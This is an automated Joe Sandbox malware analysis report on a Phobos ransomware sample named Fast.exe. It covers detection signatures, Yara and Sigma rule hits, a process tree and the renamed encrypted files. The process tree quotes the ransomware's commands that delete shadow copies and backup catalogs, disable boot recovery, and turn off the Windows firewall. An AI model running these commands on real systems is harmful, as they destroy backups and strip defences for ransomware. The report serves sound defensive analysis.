Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fast.exe

Overview

General Information

Sample name:Fast.exe
Analysis ID:1388428
MD5:ea6d3083f8c1c506fbff457bf09a7ed8
SHA1:f159c4fc7d13571e725f0ae9e0749c77cf859b4e
SHA256:000db71531e5aa8b30594d305bb3fbce8e2c71f66e2170091ef58b3c1f306f46
Tags:exephobosransomware
Infos:

Detection

Phobos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Delete shadow copy via WMIC
Yara detected Phobos
Creates files in the recycle bin to hide itself
Creates files inside the volume driver (system volume information)
Deletes shadow drive data (may be related to ransomware)
Deletes the backup plan of Windows
Drops PE files to the startup folder
Found evasive API chain (may stop execution after checking locale)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Modifies the windows firewall
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Uses bcdedit to modify the Windows boot settings
Uses netsh to modify the Windows network and firewall settings
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Fast.exe (PID: 7608 cmdline: C:\Users\user\Desktop\Fast.exe MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
    • Fast.exe (PID: 7652 cmdline: C:\Users\user\Desktop\Fast.exe MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
    • cmd.exe (PID: 7756 cmdline: C:\Windows\system32\cmd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vssadmin.exe (PID: 7924 cmdline: vssadmin delete shadows /all /quiet MD5: B58073DB8892B67A672906C9358020EC)
      • WMIC.exe (PID: 1196 cmdline: wmic shadowcopy delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • bcdedit.exe (PID: 796 cmdline: bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • bcdedit.exe (PID: 7372 cmdline: bcdedit /set {default} recoveryenabled no MD5: 74F7B84B0A547592CA63A00A8C4AD583)
      • wbadmin.exe (PID: 7820 cmdline: wbadmin delete catalog -quiet MD5: F2AA55885A2C014DA99F1355F3F71E4A)
    • cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 7932 cmdline: netsh advfirewall set currentprofile state off MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • netsh.exe (PID: 8036 cmdline: netsh firewall set opmode mode=disable MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
  • Fast.exe (PID: 4828 cmdline: "C:\Users\user\AppData\Local\Fast.exe" MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
  • Fast.exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\Fast.exe" MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
  • Fast.exe (PID: 2540 cmdline: "C:\Users\user\AppData\Local\Fast.exe" MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
  • wbengine.exe (PID: 3620 cmdline: C:\Windows\system32\wbengine.exe MD5: 17270A354A66590953C4AAC1CF54E507)
  • vdsldr.exe (PID: 7952 cmdline: C:\Windows\System32\vdsldr.exe -Embedding MD5: 472A05A6ADC167E9E5D2328AD98E3067)
  • vds.exe (PID: 8000 cmdline: C:\Windows\System32\vds.exe MD5: 0781CE7ECCD9F6318BA72CD96B5B8992)
  • Fast.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe" MD5: EA6D3083F8C1C506FBFF457BF09A7ED8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PhobosMalwareBytes states that Phobos is one of the ransomware families that are distributed via hacked Remote Desktop (RDP) connections. This isn't surprising, as hacked RDP servers are a cheap commodity on the underground market, and can make for an attractive and cost efficient dissemination vector for threat groups.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.phobos

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Fast.exeWindows_Ransomware_Phobos_11ea7be5Identifies Phobos ransomwareunknown
  • 0x4bc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Fast.exeMALWARE_Win_PhobosDetects Phobos ransomwareditekshen
  • 0x8d98:$x1: \\?\UNC\\\e-
  • 0x8c24:$x2: \\?\ :
  • 0x8dc4:$x3: POST
  • 0x8dd0:$s1: ELVL
  • 0xa7:$s3: 41 31 47 49 41 2B
  • 0xaf:$s3: 41 31 47 7D 41 2B
  • 0xbf:$s3: 41 31 47 4A 41 2B

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4236920237.0000000000CA1000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Phobos_11ea7be5Identifies Phobos ransomwareunknown
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
00000013.00000002.2135391960.00000000000D1000.00000020.00000001.01000000.00000006.sdmpWindows_Ransomware_Phobos_11ea7be5Identifies Phobos ransomwareunknown
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
00000013.00000000.2125457686.00000000000D1000.00000020.00000001.01000000.00000006.sdmpWindows_Ransomware_Phobos_11ea7be5Identifies Phobos ransomwareunknown
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
00000000.00000000.1776137882.0000000000CA1000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Phobos_11ea7be5Identifies Phobos ransomwareunknown
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
0000000E.00000000.1940315719.00000000000D1000.00000020.00000001.01000000.00000006.sdmpWindows_Ransomware_Phobos_11ea7be5Identifies Phobos ransomwareunknown
  • 0xbc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Click to see the 10 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
14.0.Fast.exe.d0000.0.unpackWindows_Ransomware_Phobos_11ea7be5Identifies Phobos ransomwareunknown
  • 0x4bc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
14.0.Fast.exe.d0000.0.unpackMALWARE_Win_PhobosDetects Phobos ransomwareditekshen
  • 0x8d98:$x1: \\?\UNC\\\e-
  • 0x8c24:$x2: \\?\ :
  • 0x8dc4:$x3: POST
  • 0x8dd0:$s1: ELVL
  • 0xa7:$s3: 41 31 47 49 41 2B
  • 0xaf:$s3: 41 31 47 7D 41 2B
  • 0xbf:$s3: 41 31 47 4A 41 2B
14.2.Fast.exe.d0000.0.unpackWindows_Ransomware_Phobos_11ea7be5Identifies Phobos ransomwareunknown
  • 0x4bc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
14.2.Fast.exe.d0000.0.unpackMALWARE_Win_PhobosDetects Phobos ransomwareditekshen
  • 0x8d98:$x1: \\?\UNC\\\e-
  • 0x8c24:$x2: \\?\ :
  • 0x8dc4:$x3: POST
  • 0x8dd0:$s1: ELVL
  • 0xa7:$s3: 41 31 47 49 41 2B
  • 0xaf:$s3: 41 31 47 7D 41 2B
  • 0xbf:$s3: 41 31 47 4A 41 2B
19.2.Fast.exe.d0000.0.unpackWindows_Ransomware_Phobos_11ea7be5Identifies Phobos ransomwareunknown
  • 0x4bc:$b1: C0 74 30 33 C0 40 8B CE D3 E0 85 C7 74 19 66 8B 04 73 66 89
Click to see the 17 entries

Sigma Signatures

Operating System Destruction

barindex
Sigma detected: Delete shadow copy via WMIC
Source: Process startedAuthor: Joe Security: Data: Command: wmic shadowcopy delete, CommandLine: wmic shadowcopy delete, CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: C:\Windows\system32\cmd.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7756, ParentProcessName: cmd.exe, ProcessCommandLine: wmic shadowcopy delete, ProcessId: 1196, ProcessName: WMIC.exe

System Summary

barindex
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Source: Process startedAuthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: vssadmin delete shadows /all /quiet, CommandLine: vssadmin delete shadows /all /quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\System32\vssadmin.exe, NewProcessName: C:\Windows\System32\vssadmin.exe, OriginalFileName: C:\Windows\System32\vssadmin.exe, ParentCommandLine: C:\Windows\system32\cmd.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7756, ParentProcessName: cmd.exe, ProcessCommandLine: vssadmin delete shadows /all /quiet, ProcessId: 7924, ProcessName: vssadmin.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Fast.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Fast.exe, ProcessId: 7608, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Fast
Sigma detected: Startup Folder File Write
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Fast.exe, ProcessId: 7608, TargetFilename: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\Fast.exe
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Fast.exe" , CommandLine: "C:\Users\user\AppData\Local\Fast.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Fast.exe, NewProcessName: C:\Users\user\AppData\Local\Fast.exe, OriginalFileName: C:\Users\user\AppData\Local\Fast.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Local\Fast.exe" , ProcessId: 4828, ProcessName: Fast.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Fast.exeAvira: detected
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exeReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Fast.exeReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exeReversingLabs: Detection: 89%
Multi AV Scanner detection for submitted file
Source: Fast.exeReversingLabs: Detection: 89%
Machine Learning detection for sample
Source: Fast.exeJoe Sandbox ML: detected
Source: Fast.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7-zip.chm.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7-zip.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7-zip32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7z.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7z.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7zCon.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7zFM.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\7zG.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\descript.ion.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\History.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\af.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\an.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ar.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ast.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\az.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ba.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\be.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\bg.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\bn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\br.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ca.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\co.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\cs.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\cy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\de.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\da.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\el.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\en.ttt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\eo.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\es.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\et.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\eu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ext.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fur.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\fy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ga.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\gl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\gu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\he.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\hi.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\hr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\hu.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\hy.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\id.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\io.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\is.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\it.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ja.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ka.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\kab.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\kaa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\kk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ko.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ku-ckb.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ku.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ky.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\lij.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\lt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\lv.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mng.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mng2.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\mr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ms.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\nb.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ne.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\nl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\nn.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\pa-in.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\pl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ps.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\pt-br.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\pt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ro.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ru.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sa.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\si.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sq.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sr-spc.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sr-spl.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sv.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\sw.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ta.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\tg.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\th.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\tk.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\tr.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\tt.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
Source: C:\Users\user\Desktop\Fast.exeDirectory created: C:\Program Files\7-Zip\Lang\ug.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eightJump to behavior
